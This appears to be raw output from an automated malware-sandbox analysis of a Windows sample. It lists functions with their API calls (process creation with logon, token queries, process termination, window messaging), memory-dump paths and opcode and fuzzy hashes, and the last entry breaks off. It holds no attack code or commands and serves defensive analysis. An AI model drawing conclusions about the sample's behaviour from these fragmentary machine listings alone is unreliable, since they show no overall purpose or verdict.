                                                                • Instruction Fuzzy Hash: A3418D71A00205EFDF15AF54DC85AAA7778FF44310F1480B9ED00AA297DB38EE65DBA4
                                                                APIs
                                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0076F3AB,00000000,?,?,00000000,?,0076682C,00000004,00000000,00000000), ref: 007A824C
                                                                • EnableWindow.USER32(00000000,00000000), ref: 007A8272
                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 007A82D1
                                                                • ShowWindow.USER32(00000000,00000004), ref: 007A82E5
                                                                • EnableWindow.USER32(00000000,00000001), ref: 007A830B
                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 007A832F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$Show$Enable$MessageSend
                                                                • String ID:
                                                                • API String ID: 642888154-0
                                                                • Opcode ID: 449ac696c46614cd7a3a9dcd69792935650a4b90bae45384b675f0f2a6200cdf
                                                                • Instruction ID: 1a61f3781e4aa8a6525ebfa625d660b535f0d0f268c456ecb0d35135aff55593
                                                                • Opcode Fuzzy Hash: 449ac696c46614cd7a3a9dcd69792935650a4b90bae45384b675f0f2a6200cdf
                                                                • Instruction Fuzzy Hash: 8041A630601684EFDF55CF14D899BA47BE0FB8B714F1842A5E6484F2A2CB396841CF56
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 00774C95
                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00774CB2
                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00774CEA
                                                                • _wcslen.LIBCMT ref: 00774D08
                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00774D10
                                                                • _wcsstr.LIBVCRUNTIME ref: 00774D1A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                • String ID:
                                                                • API String ID: 72514467-0
                                                                • Opcode ID: 84f5af59753513076653e1835788a60b981d29dd503a95a7295f21af6f7ee46b
                                                                • Instruction ID: 5f0027283bbee1c28cb1fcf7fcf94576a4574ff501fa988369f73cb72357ea09
                                                                • Opcode Fuzzy Hash: 84f5af59753513076653e1835788a60b981d29dd503a95a7295f21af6f7ee46b
                                                                • Instruction Fuzzy Hash: 3321FC31704210BBEF269B39AC49E7B7BACDF46790F10C079F909CA152EF69DC0196A0
                                                                APIs
                                                                  • Part of subcall function 00713AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00713A97,?,?,00712E7F,?,?,?,00000000), ref: 00713AC2
                                                                • _wcslen.LIBCMT ref: 0078587B
                                                                • CoInitialize.OLE32(00000000), ref: 00785995
                                                                • CoCreateInstance.OLE32(007AFCF8,00000000,00000001,007AFB68,?), ref: 007859AE
                                                                • CoUninitialize.OLE32 ref: 007859CC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                • String ID: .lnk
                                                                • API String ID: 3172280962-24824748
                                                                • Opcode ID: f9485ed47985ed062a0fa549f9876482bca39d04c0e813234eb46eed9f8eaddf
                                                                • Instruction ID: f8a96ac652b3e176f9f853fad41bec5c444adacae372b3beb4e22e432c6b2ebb
                                                                • Opcode Fuzzy Hash: f9485ed47985ed062a0fa549f9876482bca39d04c0e813234eb46eed9f8eaddf
                                                                • Instruction Fuzzy Hash: CAD164B1604600DFC714EF28C48496ABBF2FF89710F148859F8899B361DB39EC45CB92
                                                                APIs
                                                                  • Part of subcall function 00770FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00770FCA
                                                                  • Part of subcall function 00770FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00770FD6
                                                                  • Part of subcall function 00770FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00770FE5
                                                                  • Part of subcall function 00770FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00770FEC
                                                                  • Part of subcall function 00770FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00771002
                                                                • GetLengthSid.ADVAPI32(?,00000000,00771335), ref: 007717AE
                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007717BA
                                                                • HeapAlloc.KERNEL32(00000000), ref: 007717C1
                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 007717DA
                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00771335), ref: 007717EE
                                                                • HeapFree.KERNEL32(00000000), ref: 007717F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                • String ID:
                                                                • API String ID: 3008561057-0
                                                                • Opcode ID: d3b02d56c4187fc380885b36928dc8575edbbb08a98201ff1ee6d5f004ec8cf1
                                                                • Instruction ID: 8ed5e9991a0465e5a934a10b3af634b5a47f608cb001feade70c71aea4b97aae
                                                                • Opcode Fuzzy Hash: d3b02d56c4187fc380885b36928dc8575edbbb08a98201ff1ee6d5f004ec8cf1
                                                                • Instruction Fuzzy Hash: 55117C71600209FFDF199FA8CC49BAF7BA9EB86395F50C018F44597210D739A944CFA0
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007714FF
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00771506
                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00771515
                                                                • CloseHandle.KERNEL32(00000004), ref: 00771520
                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0077154F
                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00771563
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                • String ID:
                                                                • API String ID: 1413079979-0
                                                                • Opcode ID: 6748936c245cea50d734746a489ac87a9c3e8a1344bd80e221dd226d660851b8
                                                                • Instruction ID: 5b381dcc736f60cc94a0fd1a315759107b45225552f6b37422945c5c586b3ad5
                                                                • Opcode Fuzzy Hash: 6748936c245cea50d734746a489ac87a9c3e8a1344bd80e221dd226d660851b8
                                                                • Instruction Fuzzy Hash: AF113A7250024DBBDF128F98DD49FDE7BA9EF89744F048055FA09A2160C379CE64DB61
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,00733379,00732FE5), ref: 00733390
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0073339E
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007333B7
                                                                • SetLastError.KERNEL32(00000000,?,00733379,00732FE5), ref: 00733409
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 1cb878e9541a7748a5e2687d32209911190f9a22681509b93f1b84d8ff306b65
                                                                • Instruction ID: a511d4771ce9f10f6cfae09293ef845fac0fef325e1fe403ed703c08272bfe34
                                                                • Opcode Fuzzy Hash: 1cb878e9541a7748a5e2687d32209911190f9a22681509b93f1b84d8ff306b65
                                                                • Instruction Fuzzy Hash: D001F73360E312FEBA3627757C8A6676BA4EB05379F20C22AF410852F3EF1D4D019548
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,00745686,00753CD6,?,00000000,?,00745B6A,?,?,?,?,?,0073E6D1,?,007D8A48), ref: 00742D78
                                                                • _free.LIBCMT ref: 00742DAB
                                                                • _free.LIBCMT ref: 00742DD3
                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,0073E6D1,?,007D8A48,00000010,00714F4A,?,?,00000000,00753CD6), ref: 00742DE0
                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,0073E6D1,?,007D8A48,00000010,00714F4A,?,?,00000000,00753CD6), ref: 00742DEC
                                                                • _abort.LIBCMT ref: 00742DF2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_free$_abort
                                                                • String ID:
                                                                • API String ID: 3160817290-0
                                                                • Opcode ID: 7a9b99ff6b36a3e66fa9f31e3dba58e66db0b8578298f5553c8cfa8f4ea0ab02
                                                                • Instruction ID: 96582149e7a18aa565d2bd9d77c745bc56a14802e904a7250713dd578122b68a
                                                                • Opcode Fuzzy Hash: 7a9b99ff6b36a3e66fa9f31e3dba58e66db0b8578298f5553c8cfa8f4ea0ab02
                                                                • Instruction Fuzzy Hash: 79F0A431A05A01B7C6176735AC0EB1A2669AFC27A1B644419F824921A3EF6C98235961
                                                                APIs
                                                                  • Part of subcall function 00729639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00729693
                                                                  • Part of subcall function 00729639: SelectObject.GDI32(?,00000000), ref: 007296A2
                                                                  • Part of subcall function 00729639: BeginPath.GDI32(?), ref: 007296B9
                                                                  • Part of subcall function 00729639: SelectObject.GDI32(?,00000000), ref: 007296E2
                                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 007A8A4E
                                                                • LineTo.GDI32(?,00000003,00000000), ref: 007A8A62
                                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 007A8A70
                                                                • LineTo.GDI32(?,00000000,00000003), ref: 007A8A80
                                                                • EndPath.GDI32(?), ref: 007A8A90
                                                                • StrokePath.GDI32(?), ref: 007A8AA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                • String ID:
                                                                • API String ID: 43455801-0
                                                                • Opcode ID: f189f7e5377d671cdcd34bcb2df62b6c4fbd0e0e5763f17844bded78397a432d
                                                                • Instruction ID: 4f4340b4b2601cdd0fea9a7bc33a75edba9c1d00a44da350c2eb9aff0ba56d33
                                                                • Opcode Fuzzy Hash: f189f7e5377d671cdcd34bcb2df62b6c4fbd0e0e5763f17844bded78397a432d
                                                                • Instruction Fuzzy Hash: CB11057600014CFFEB129F90DC88EAA7FACEB09350F04C022BA199A1A1C775AD55DBA4
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 00775218
                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00775229
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00775230
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00775238
                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0077524F
                                                                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00775261
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CapsDevice$Release
                                                                • String ID:
                                                                • API String ID: 1035833867-0
                                                                • Opcode ID: b3e319468c20a5904b1dcba83accac3ccb0fe2764d29e547bcc09d44900790ff
                                                                • Instruction ID: 9d16cef0de00a27920edc8651dfc34e6fd2cbf97a01d1a1cc0abf62477e07d94
                                                                • Opcode Fuzzy Hash: b3e319468c20a5904b1dcba83accac3ccb0fe2764d29e547bcc09d44900790ff
                                                                • Instruction Fuzzy Hash: A9018FB5A00708BBEF119BA59C49A4EBFB8FB89351F048065FA04A7281D6749C00CBA4
                                                                APIs
                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00711BF4
                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00711BFC
                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00711C07
                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00711C12
                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00711C1A
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00711C22
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Virtual
                                                                • String ID:
                                                                • API String ID: 4278518827-0
                                                                • Opcode ID: fc642aee033f1221e76e13a64784fe0779d9a835314785496a78a6f3dfd8d76a
                                                                • Instruction ID: a20a0c87b58452d5c1ddddab5f1d37eb41ec8c55d5821e473e5ae642fe3e6d68
                                                                • Opcode Fuzzy Hash: fc642aee033f1221e76e13a64784fe0779d9a835314785496a78a6f3dfd8d76a
                                                                • Instruction Fuzzy Hash: 9B0167B0902B5ABDE3008F6A8C85B52FFE8FF59354F04415BA15C4BA42C7F5A864CBE5
                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0077EB30
                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0077EB46
                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0077EB55
                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0077EB64
                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0077EB6E
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0077EB75
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                • String ID:
                                                                • API String ID: 839392675-0
                                                                • Opcode ID: 0d377c04bfc5174237b0e949df107f1c5106daff4dce21238caee43cc5929a47
                                                                • Instruction ID: 0f139b76699644a87a5f3d4eddf8348181555bf9412fe73629aba430720de79f
                                                                • Opcode Fuzzy Hash: 0d377c04bfc5174237b0e949df107f1c5106daff4dce21238caee43cc5929a47
                                                                • Instruction Fuzzy Hash: 99F054B2240158BBE7225B52DC0EEEF3E7CEFCBB11F008159F601D1091DBA85A01C6B9
                                                                APIs
                                                                • GetClientRect.USER32(?), ref: 00767452
                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00767469
                                                                • GetWindowDC.USER32(?), ref: 00767475
                                                                • GetPixel.GDI32(00000000,?,?), ref: 00767484
                                                                • ReleaseDC.USER32(?,00000000), ref: 00767496
                                                                • GetSysColor.USER32(00000005), ref: 007674B0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                • String ID:
                                                                • API String ID: 272304278-0
                                                                • Opcode ID: 955d9d2d1692ecae10325e30531b312c775556a2193b78c03b514b7309e399df
                                                                • Instruction ID: 3d61583e9d91f65e67d43268180fb97b0f65bd871d68cb52166a922b7edf9fa1
                                                                • Opcode Fuzzy Hash: 955d9d2d1692ecae10325e30531b312c775556a2193b78c03b514b7309e399df
                                                                • Instruction Fuzzy Hash: 26018B31400215FFDB129FA4DD08BAA7FB5FB45311F648060FD16A61A0CF391E51EB54
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0077187F
                                                                • UnloadUserProfile.USERENV(?,?), ref: 0077188B
                                                                • CloseHandle.KERNEL32(?), ref: 00771894
                                                                • CloseHandle.KERNEL32(?), ref: 0077189C
                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 007718A5
                                                                • HeapFree.KERNEL32(00000000), ref: 007718AC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                • String ID:
                                                                • API String ID: 146765662-0
                                                                • Opcode ID: ff7577a8d729257f1c7764fb8715b9552954c501a4919a72a8ba55212f0f0376
                                                                • Instruction ID: b726b52f8103410e8cfcbcff62722f60089ad6ea9eb3f69ca9adda4f899ceca5
                                                                • Opcode Fuzzy Hash: ff7577a8d729257f1c7764fb8715b9552954c501a4919a72a8ba55212f0f0376
                                                                • Instruction Fuzzy Hash: C7E0E576204105BBDB025FA1ED0C90ABF79FF8AB22B10C220F22581070CB369821DF5A
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 0071BEB3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Init_thread_footer
                                                                • String ID: D%~$D%~$D%~$D%~D%~
                                                                • API String ID: 1385522511-534703835
                                                                • Opcode ID: 1343a3f6fbcd1d376515c2c935e1da7bb02243d77fcaf1ce119dfffed9facd63
                                                                • Instruction ID: 0bde99fd833bef1f27ec1452ea331335c1f37e5bb5b901c50471117c5d4c6e54
                                                                • Opcode Fuzzy Hash: 1343a3f6fbcd1d376515c2c935e1da7bb02243d77fcaf1ce119dfffed9facd63
                                                                • Instruction Fuzzy Hash: 55911775A0020ADFCB18CF5DC0916EAB7F1FF58310F248169D985AB391E779A981CBE0
                                                                APIs
                                                                  • Part of subcall function 00730242: EnterCriticalSection.KERNEL32(007E070C,007E1884,?,?,0072198B,007E2518,?,?,?,007112F9,00000000), ref: 0073024D
                                                                  • Part of subcall function 00730242: LeaveCriticalSection.KERNEL32(007E070C,?,0072198B,007E2518,?,?,?,007112F9,00000000), ref: 0073028A
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                  • Part of subcall function 007300A3: __onexit.LIBCMT ref: 007300A9
                                                                • __Init_thread_footer.LIBCMT ref: 00797BFB
                                                                  • Part of subcall function 007301F8: EnterCriticalSection.KERNEL32(007E070C,?,?,00728747,007E2514), ref: 00730202
                                                                  • Part of subcall function 007301F8: LeaveCriticalSection.KERNEL32(007E070C,?,00728747,007E2514), ref: 00730235
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                • String ID: +Tv$5$G$Variable must be of type 'Object'.
                                                                • API String ID: 535116098-960950384
                                                                • Opcode ID: e818b5c8e1e42a082aca37c9de6eddaf358e1ef105d3a2c59341eaeebb608889
                                                                • Instruction ID: 138e8bf49927cae45a7c690dcc88912c4f30414e035a2e5d46fe7741fc3150a3
                                                                • Opcode Fuzzy Hash: e818b5c8e1e42a082aca37c9de6eddaf358e1ef105d3a2c59341eaeebb608889
